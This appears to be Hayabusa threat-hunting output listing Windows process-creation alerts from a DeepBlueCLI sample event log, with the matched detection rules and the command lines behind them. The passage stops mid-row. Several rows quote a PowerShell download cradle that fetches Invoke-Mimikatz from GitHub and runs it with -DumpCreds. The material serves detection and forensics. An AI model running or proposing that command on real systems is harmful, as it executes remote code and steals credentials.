Download,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_download_cradles.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:28:35.375 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0xb3c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:29:40.093 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0xf74 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:30:06.203 +00:00,IE10Win7,4688,high,Exec,Suspicious PowerShell Download and Execute Pattern,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_download_patterns.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:30:06.203 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x2a4 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:30:06.203 +00:00,IE10Win7,4688,high,,Suspicious Program Names,,rules/sigma/process_creation_builtin/proc_creation_win_susp_progname.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:30:06.203 +00:00,IE10Win7,4688,high,,PowerShell Web Download and Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_download_iex.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:30:06.203 +00:00,IE10Win7,4688,medium,Exec,PowerShell Download from URL,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_download.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:30:06.203 +00:00,IE10Win7,4688,medium,CredAccess,Mimikatz Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:30:06.203 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:30:06.203 +00:00,IE10Win7,4688,medium,Exec,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_susp_web_request_cmd.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:30:06.203 +00:00,IE10Win7,4688,medium,,PowerShell Web Download,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_download_cradles.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:38:23.076 +00:00,IE10Win7,4688,high,Exec,Suspicious PowerShell Download and Execute Pattern,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_download_patterns.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:38:23.076 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa9c | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:38:23.076 +00:00,IE10Win7,4688,high,,Suspicious Program Names,,rules/sigma/process_creation_builtin/proc_creation_win_susp_progname.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:38:23.076 +00:00,IE10Win7,4688,high,,PowerShell Web Download and Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_download_iex.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:38:23.076 +00:00,IE10Win7,4688,medium,Exec,PowerShell Download from URL,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_download.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:38:23.076 +00:00,IE10Win7,4688,medium,CredAccess,Mimikatz Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:38:23.076 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:38:23.076 +00:00,IE10Win7,4688,medium,Exec,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_susp_web_request_cmd.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:38:23.076 +00:00,IE10Win7,4688,medium,,PowerShell Web Download,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_download_cradles.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:51:10.232 +00:00,IE10Win7,4688,high,Exec,Suspicious PowerShell Download and Execute Pattern,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_download_patterns.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:51:10.232 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x4fc | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:51:10.232 +00:00,IE10Win7,4688,high,,Suspicious Program Names,,rules/sigma/process_creation_builtin/proc_creation_win_susp_progname.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:51:10.232 +00:00,IE10Win7,4688,high,,PowerShell Web Download and Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_download_iex.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:51:10.232 +00:00,IE10Win7,4688,medium,Exec,PowerShell Download from URL,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_download.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:51:10.232 +00:00,IE10Win7,4688,medium,CredAccess,Mimikatz Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:51:10.232 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:51:10.232 +00:00,IE10Win7,4688,medium,Exec,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_susp_web_request_cmd.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:51:10.232 +00:00,IE10Win7,4688,medium,,PowerShell Web Download,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_download_cradles.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:51:19.681 +00:00,IE10Win7,4688,high,Exec,Suspicious PowerShell Download and Execute Pattern,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_download_patterns.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:51:19.681 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe70 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:51:19.681 +00:00,IE10Win7,4688,high,,Suspicious Program Names,,rules/sigma/process_creation_builtin/proc_creation_win_susp_progname.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:51:19.681 +00:00,IE10Win7,4688,high,,PowerShell Web Download and Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_download_iex.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:51:19.681 +00:00,IE10Win7,4688,medium,Exec,PowerShell Download from URL,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_download.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:51:19.681 +00:00,IE10Win7,4688,medium,CredAccess,Mimikatz Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:51:19.681 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:51:19.681 +00:00,IE10Win7,4688,medium,Exec,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_susp_web_request_cmd.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:51:19.681 +00:00,IE10Win7,4688,medium,,PowerShell Web Download,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_download_cradles.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 22:00:00.553 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x97c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 22:01:50.906 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd1c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 22:01:50.943 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x904 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 22:09:18.579 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 22:42:19.877 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc34 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 22:42:28.120 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xbf4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 22:42:44.834 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd18 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 22:43:00.291 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x3a8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 22:43:02.541 +00:00,IE10Win7,4688,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 22:43:04.576 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\hp2phgfx.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0xd50 | User: IEUser | LID: 0x4d011",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 22:43:04.576 +00:00,IE10Win7,4688,medium,Evas,Suspicious Csc.exe Source File Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_csc_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 22:44:00.792 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd08 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 22:44:00.843 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb70 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 22:44:01.081 +00:00,IE10Win7,4688,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 22:44:02.654 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\lnyiquaj.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0x818 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 22:44:02.654 +00:00,IE10Win7,4688,medium,Evas,Suspicious Csc.exe Source File Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_csc_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 22:45:43.530 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xce4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 22:45:43.908 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x3a0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 22:45:43.919 +00:00,IE10Win7,4688,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 22:45:45.304 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\zqai1ke3.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0xb8c | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 22:45:45.304 +00:00,IE10Win7,4688,medium,Evas,Suspicious Csc.exe Source File Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_csc_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 22:45:54.936 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe48 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 22:45:54.972 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf88 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 22:45:55.305 +00:00,IE10Win7,4688,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 22:45:57.041 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\lygfnats.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0x21c | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 22:45:57.041 +00:00,IE10Win7,4688,medium,Evas,Suspicious Csc.exe Source File Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_csc_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 22:47:08.750 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 22:47:33.985 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xcd8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 22:47:34.016 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd48 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 22:47:34.235 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 22:49:42.000 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\findstr.exe"" ""Command Line"" | Path: C:\Windows\System32\findstr.exe | PID: 0x708 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 22:50:40.032 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\findstr.exe"" Command | Path: C:\Windows\System32\findstr.exe | PID: 0x6e0 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 22:53:47.579 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\findstr.exe"" ""Command Line"" | Path: C:\Windows\System32\findstr.exe | PID: 0xebc | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 22:54:04.375 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\findstr.exe"" ""Command Line"" | Path: C:\Windows\System32\findstr.exe | PID: 0xb78 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 22:59:07.782 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\findstr.exe"" csc | Path: C:\Windows\System32\findstr.exe | PID: 0x9c8 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 23:01:26.782 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xa00 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 23:01:26.782 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x5b8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 15:03:05.634 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 15:03:05.916 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x108 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 15:03:06.197 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 15:03:06.884 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xc34 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 15:03:06.931 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xfcc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 15:03:25.697 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: 